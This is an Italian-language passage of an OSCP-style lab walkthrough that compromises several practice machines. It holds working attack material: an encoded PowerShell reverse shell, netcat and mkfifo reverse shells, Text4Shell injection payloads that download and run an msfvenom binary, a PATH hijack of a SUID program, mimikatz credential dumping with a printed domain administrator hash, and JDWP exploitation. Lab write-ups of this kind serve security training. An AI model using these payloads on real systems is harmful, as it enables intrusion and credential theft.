BzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAH
sAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQ
BtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnAC
kALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQ
BuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAH
UAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbg
BkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArAC
AAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbw
BkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAG
IAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdA
BlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG
0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49243

PS C:\> whoami
nt service\mssql$sqlexpress

Apro una nuova regola di routing sulla macchina MS01 per forwardare il traffico sulla porta 5566 e poi apro una shell con PrintSpoofer sfruttando il privilegio SeImpersonatePrivilege:

PowerShell
PS C:\Temp> .\PrintSpoofer64.exe -c "c:\temp\nc.exe 10.10.140.147 5566 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
PS C:\Temp>
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49256
Microsoft Windows [Version 10.0.19042.1586]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Lancio mimkatz per verificare eventuali hash interessanti:

PowerShell
C:\Temp>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

E trovo l'hash di Administrator di dominio:

PowerShell
Authentication Id : 0 ; 382174 (00000000:0005d4de)                                                             
Session           : Interactive from 1                                                                         
User Name         : Administrator                                                                              
Domain            : OSCP
Logon Server      : DC01
Logon Time        : 12/7/2024 9:16:10 AM
SID               : S-1-5-21-2610934713-1581164095-2706428072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : OSCP
         * NTLM     : 59b280ba707d22e3ef0aa587fc29ffe5
         * SHA1     : f41a495e6d341c7416a42abd14b9aef6f1eb6b17
         * DPAPI    : 959ad2ea78c63aebf3233679ad90d769
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : OSCP
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : OSCP.EXAM
         * Password : (null)
        ssp :
        credman :
        cloudap :

A questo punto provo a connettermi al DC tramite winrm.

Kiero

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_kiero.txt 192.168.199.149
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 09:46 CET
Nmap scan report for 192.168.199.149
Host is up (0.075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p21,22,80 -oN alltcp_kiero.txt 192.168.199.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 09:47 CET
Nmap scan report for 192.168.199.149
Host is up (0.068s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5c:5f:f1:bb:02:f9:14:7c:8e:38:32:2b:f4:bc:d0:8c (RSA)
|   256 18:e2:47:e1:c8:40:a1:d0:2c:a5:87:97:bd:01:12:27 (ECDSA)
|_  256 26:2d:98:d9:47:6d:22:5d:4a:14:7a:24:5c:98:a2:1d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Port 21

Accedo in ftp con le credenziali kiero:kiero:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ftp 192.168.199.149
Connected to 192.168.199.149.
220 (vsFTPd 3.0.3)
Name (192.168.199.149:momphucker): kiero
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10100|)
150 Here comes the directory listing.
-rwxr-xr-x    1 114      119          2590 Nov 21  2022 id_rsa
-rw-r--r--    1 114      119           563 Nov 21  2022 id_rsa.pub
-rwxr-xr-x    1 114      119          2635 Nov 21  2022 id_rsa_2
226 Directory send OK.
ftp>

Port 80

007.png

Exploit

Copio i file trovati nella cartella ftp dentro la cartella .ssh di kali e fornisco i giusti permessi:

Bash
sudo chmod 700 ~/.ssh && \
sudo chmod -R 600 ~/.ssh/* && \
sudo chmod -R 644 ~/.ssh/*.pub

Controllo il file id_rsa.pub per capire qual'è lutente:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/.ssh]
└─$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8J1/BFjH/Oet/zx+bKUUop1IuGd93QKio7Dt7Xl/J91c2EvGkYDKL5xGbfQRxsT9IePkVINONXQHmzARaNS5lE+SoAfFAnCPnRJ+KrnJdPxYf4OQEiAxHwRJHvbYaxEEuye7GKP6V0MdSvDtqKsFk0YRFVdPKuforL/8SYtSfqYUywUJ/ceiZL/2ffGGBJ/trQJ2bBL4QcOg05ZxrEoiTJ09+Sw3fKrnhNa5/NzYSib+0llLtlGbagBh3F9n10yqqLlpgTjDp5PKenncFiKl1llJlQGcGhLXxeoTI59brTjssp8J+z6A48h699CexyGe02GZfKLLLE+wKn/4luY0Ve8tnGllEdNFfGFVm7WyTmAO2vtXMmUbPaavDWE9cJ/WFXovDKtNCJxpyYVPy2f7aHYR37arLL6aEemZdqzDwl67Pu5y793FLd41qWHG6a4XD05RHAD0ivsJDkypI8gMtr3TOmxYVbPmq9ecPFmSXxVEK8oO3qu2pxa/e4izXBFc= john@oscp

E accedo via ssh:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ssh -l john 192.168.199.149
Last login: Tue Nov 22 08:31:27 2022 from 192.168.118.3
john@oscp:~$

Privilege Escalation

Nella home di john è presente l'inusuale file eseguibile RESET_PASSWD di proprietà dioo root ed è eseguibile anche da john stesso.

Bash
john@oscp:~$ ll
total 916
drwxr-xr-x 6 john john   4096 Jan  5 09:03 ./
drwxr-xr-x 4 root root   4096 Nov 17  2022 ../
lrwxrwxrwx 1 root root      9 Nov 21  2022 .bash_history -> /dev/null
-rw-r--r-- 1 john john    220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 john john   3771 Feb 25  2020 .bashrc
drwx------ 2 john john   4096 Nov  2  2022 .cache/
drwx------ 3 john john   4096 Jan  5 09:03 .gnupg/
-rw------- 1 john john     33 Nov 17  2022 .lesshst
-rw-r--r-- 1 john john    807 Feb 25  2020 .profile
drwx------ 2 john john   4096 Nov 21  2022 .ssh/
-rw------- 1 john john    816 Nov 22  2022 .viminfo
-rw-rw-r-- 1 john john    257 Nov 22  2022 .wget-hsts
-rwsrwsr-x 1 root root  16792 Nov 21  2022 RESET_PASSWD*
-rwxr-xr-x 1 john john 862779 Jan  5 09:00 linpeas.sh*
-rw-r--r-- 1 john john     33 Jan  5 08:44 local.txt
drwx------ 3 john john   4096 Jan  5 09:03 snap/

Lo analizzo con strings:

Bash
john@oscp:~$ strings RESET_PASSWD

[...]
echo kiero:kiero | chpasswd
echo Resetting password of 'kiero' to the default value
[...]

Lo script esegue una serie di comandi per resettare la password di kiero. Lo script chiama chpasswd ma non con un percorso assoluto, quindi teoricamente potrebbe cercarlo nella stessa directory dell'eseguibuile. Creo con msfvenom una reverse shell denoniminata chpasswd e la carico nella home di john:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=5566 -f elf -o chpasswd   
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: chpasswd

Apro un listener sulla porta 5566 ed eseguo lo script dopo aver fornito i permessi di esecuzione a chpasswd:

Bash
john@oscp:~$ ./RESET_PASSWD 
Resetting password of kiero to the default value

Per qualche motivo il file chpasswd avelenato non viene chiamato, quindi lo inserisco in PATH:

Bash
john@oscp:~$ export PATH=/home/john
john@oscp:~$ ./RESET_PASSWD 
Resetting password of kiero to the default value

A questo punto viene aperta la shell come root nel listner sulal porta 5566:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.199.149] 41266
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@oscp:/home/john#

Infine recupero le flags:

008.png

Berlin

  • Ip Target: 192.168.149.150

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_berlin.txt 192.168.149.150        
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 10:45 CET
Nmap scan report for 192.168.149.150
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p22,8080 -oN alltcp_berlin.txt 192.168.149.150 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 10:46 CET
Nmap scan report for 192.168.149.150
Host is up (0.074s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ad:ac:80:0a:5f:87:44:ea:ba:7f:95:ca:1e:90:78:0d (ECDSA)
|_  256 b3:ae:d1:25:24:c2:ab:4f:f9:40:c5:f0:0b:12:87:bb (ED25519)
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Spring Java Framework
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: application/json;charset=UTF-8
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     {"timestamp":"2025-01-05T09:46:38.665+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/plain;charset=UTF-8
|     Content-Length: 19
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     {"api-status":"up"}
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 830
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 800
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=1/5%Time=677A54FE%P=aarch64-unknown-linux-
SF:gnu%r(GetRequest,98,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/plai
SF:n;charset=UTF-8\r\nContent-Length:\x2019\r\nDate:\x20Sun,\x2005\x20Jan\
SF:x202025\x2009:46:38\x20GMT\r\nConnection:\x20close\r\n\r\n{\"api-status
SF:\":\"up\"}")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,HE
SF:AD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sun,\x2005\x20Jan\x20202
SF:5\x2009:46:38\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,3C
SF:6,"HTTP/1\.1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\n
SF:Content-Language:\x20en\r\nContent-Length:\x20830\r\nDate:\x20Sun,\x200
SF:5\x20Jan\x202025\x2009:46:38\x20GMT\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x
SF:20Version\x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20
SF:{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D
SF:76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color
SF::white;background-color:#525D76;font-size:16px;}\x20h3\x20{font-family:
SF:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:
SF:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color:black;back
SF:ground-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color
SF::white;background-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,san
SF:s-serif;background:white;color:black;font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;background-
SF:color:#525D76;border:none;}</style></head><body><h1")%r(FourOhFourReque
SF:st,113,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20application/json;chars
SF:et=UTF-8\r\nDate:\x20Sun,\x2005\x20Jan\x202025\x2009:46:38\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n{\"timestamp\":\"2025-01-05T09:46:38\.665\+00
SF:00\",\"status\":404,\"error\":\"Not\x20Found\",\"message\":\"No\x20mess
SF:age\x20available\",\"path\":\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}"
SF:)%r(Socks5,3BB,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;char
SF:set=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20800\r\nDate:
SF:\x20Sun,\x2005\x20Jan\x202025\x2009:46:38\x20GMT\r\nConnection:\x20clos
SF:e\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20St
SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"t
SF:ext/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgr
SF:ound-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,
SF:sans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\
SF:x20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#5
SF:25D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;
SF:color:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,
SF:sans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:
SF:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x
SF:20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height
SF::1px;background-color:#525D76;border:none;}</style></head><body");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 8080

009.png

010.png

011.png

012.png

Exploit

Il servizio sulla porta 8080 è Spring Boot e, come indicato su http://192.168.149.150:8080/CHANGELOG utilizza Apache Commons Text 1.8. Questo sembra avere la vulnerabilità nota come text4shell. A questo link alcune info a riguardo.

Eseguo sul terminale sudo tcpdump -i tun0 icmp per verificare se arrivano i ping.

Provo ad eseguire la chiamata ${script:javascript:java.lang.Runtime.getRuntime().exec('ping -c 5 192.168.45.248')} nella query di ricerca:

013.png

I ping arrivano, quindi lo script esegue effettivamente i comandi:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for momphucker: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:19:08.710713 IP 192.168.149.150 > 192.168.45.248: ICMP echo request, id 6, seq 1, length 64
14:19:08.710730 IP 192.168.45.248 > 192.168.149.150: ICMP echo reply, id 6, seq 1, length 64

Provo ad inserire comandi di questo tipo, ma senza alcun risultato:

Text Only
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.45.248 4444 -e /bin/bash')}
${script:javascript:java.lang.Runtime.getRuntime().exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.248 4444 >/tmp/f')}
[...]

Allora quello che provo a fare è:

  1. Creare una reverse shell con msfvenom:

    Bash
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4444 -f elf -o rev.elf

  2. Rendere la reverse shell disponibile tramite webserver per caricarla sulla macchina target con lo script:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('wget -O /tmp/rev.elf 192.168.45.248/rev.elf')}

  3. Fornire i permessi di esecuzione:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('chmod +x /tmp/rev.elf')}

  4. Infine eseguire la chiamata sul listener 4444 precedentemente aperto:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('/tmp/rev.elf')}

La shell viene aperta come dev:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 4444   
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 33004

whoami
dev
python3 -c 'import pty; pty.spawn("/bin/bash")'
dev@oscp:/$

Infine catturo la flag local.txt:

014.png

Privilege Escalation

Carico sulla macchina linpeas e lo eseguo. Mi evidenzia una possibile vulnerabilità sul JWDP, un servizio java. Trovo l'exploit jdwp-shellifier che agisce sulla porta 8000 del servizio. L'exploit deve essere eseguito tramite python2 che però non è presente sulla macchina target. Devo eseguirlo quindi sulla macchina kali ma la porta 8000 non è raggiungibile esternamente. Carico quindi sulla macchina un eseguibile di socat in modo che possa lanciarlo anche senza sudo. In questo modo, dato che la porta 8000 non è aperta verso l'esterno, apro la 8002 e reindirizzo il traffico alla 8000.

Bash
dev@oscp:/chmod +x socat
dev@oscp:/home/dev$ ./socat TCP-LISTEN:8002,fork TCP:localhost:8000
./socat TCP-LISTEN:8002,fork TCP:localhost:8000

Memore del fatto che netcat sembra non funzionare correttamente, creo una reverse shell con msfvenom e poi la carico sulla macchina target:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=1234 -f elf -o reverse.elf

A questo punto lancio l'exploit:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ python2 ./46501.py -t 192.168.149.150 -p 8002 --cmd "/home/dev/reverse.elf"
[+] Targeting '192.168.149.150:8002'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f82e002e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'

L'exploit rimane in attesa di una chiamata verso il servizio java.net.ServerSocket.accept.

Dopo una verifica più approffondita, sembra che la chiamata venga attesa sulla porta 5000:

Java
dev@oscp:/opt/stats$ cat App.java
cat App.java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.ServerSocket;
import java.net.Socket;

class StatsApp {
    public static void main(String[] args) {
        System.out.println("System Stats\n");
        Runtime rt = Runtime.getRuntime();
        String output = new String();

        try {
            ServerSocket echod = new ServerSocket(5000);
            while (true) {
              output = "";
              output += "Available Processors: " + rt.availableProcessors() +"\r\n";
              output += "Free Memory: " + rt.freeMemory() + "\r\n";
              output += "Total Memory: " + rt.totalMemory() +"\r\n";

              Socket socket = echod.accept();
              InputStream in = socket.getInputStream();
              OutputStream out = socket.getOutputStream();
              out.write((output + "\r\n").getBytes());
              System.out.println(output);
            }
        } catch (IOException e) {
            System.err.println(e.toString());
            System.exit(1);
        }
    }
}

Considerando che socat è stato lanciato come fork, posso chiudere la shell perchè il processo rimarra comunque in esecuzione, e riaprirla per fare la chiamata sulla porta 5000:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 34022
python3 -c 'import pty; pty.spawn("/bin/bash")'
dev@oscp:/$ cd /home/dev
cd /home/dev
dev@oscp:/home/dev$ curl http://127.0.0.1:5000
curl http://127.0.0.1:5000
curl: (1) Received HTTP/0.9 when not allowed
dev@oscp:/home/dev$

A questo punto l'exploit copleta il processo:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ python2 ./46501.py -t 192.168.149.150 -p 8002 --cmd "/home/dev/reverse.elf"
[+] Targeting '192.168.149.150:8002'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f82e002e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x94d
[+] Selected payload '/home/dev/reverse.elf'
[+] Command string object created id:94e
[+] Runtime.getRuntime() returned context id:0x94f
[+] found Runtime.exec(): id=7f82e002e0e0
[+] Runtime.exec() successful, retId=950
[!] Command successfully executed

A pre la shell come root nel listener messo precedentemente in ascolto sulla porta 1234:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 1234 
listening on [any] 1234 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 42980
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@oscp:/# whoami
whoami
root
root@oscp:/#

Infine recupero la flag proof.txt:

015.png

Gust

Ip Target: 192.168.149.151

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.149.151      
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 11:41 CET
Nmap scan report for 192.168.149.151
Host is up (0.066s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
2855/tcp open  msrp
2856/tcp open  cesdinv
3389/tcp open  ms-wbt-server
5060/tcp open  sip
5066/tcp open  stanag-5066
5080/tcp open  onscreen
7443/tcp open  oracleas-https
8021/tcp open  ftp-proxy
8081/tcp open  blackice-icecap
8082/tcp open  blackice-alerts

┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ sudo nmap -Pn -sC -sV -p80,2855,2856,3389,5060,50566,5080,7443,8021,8081,8082 -oN alltcp.txt 192.168.149.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 11:44 CET
Nmap scan report for 192.168.149.151
Host is up (0.067s latency).

PORT      STATE    SERVICE          VERSION
80/tcp    open     http             Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
2855/tcp  open     msrp?
2856/tcp  open     ssl/cesdinv?
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
|_ssl-date: TLS randomness does not represent time
3389/tcp  open     ms-wbt-server    Microsoft Terminal Services
|_ssl-date: 2025-01-06T10:48:15+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=OSCP
| Not valid before: 2024-12-06T18:20:01
|_Not valid after:  2025-06-07T18:20:01
| rdp-ntlm-info: 
|   Target_Name: OSCP
|   NetBIOS_Domain_Name: OSCP
|   NetBIOS_Computer_Name: OSCP
|   DNS_Domain_Name: OSCP
|   DNS_Computer_Name: OSCP
|   Product_Version: 10.0.19041
|_  System_Time: 2025-01-06T10:48:02+00:00
5060/tcp  open     sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5080/tcp  open     sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
7443/tcp  open     ssl/websocket    (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
8021/tcp  open     freeswitch-event FreeSWITCH mod_event_socket
8081/tcp  open     websocket        (WebSocket version: 13)
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8082/tcp  open     ssl/websocket    (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
50566/tcp filtered unknown
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=1/6%Time=677BB420%P=aarch64-unknown-
SF:linux-gnu%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-
SF:WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8081-TCP:V=7.94SVN%I=7%D=1/6%Time=677BB40C%P=aarch64-unknown-linux-
SF:gnu%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocke
SF:t-Version:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x
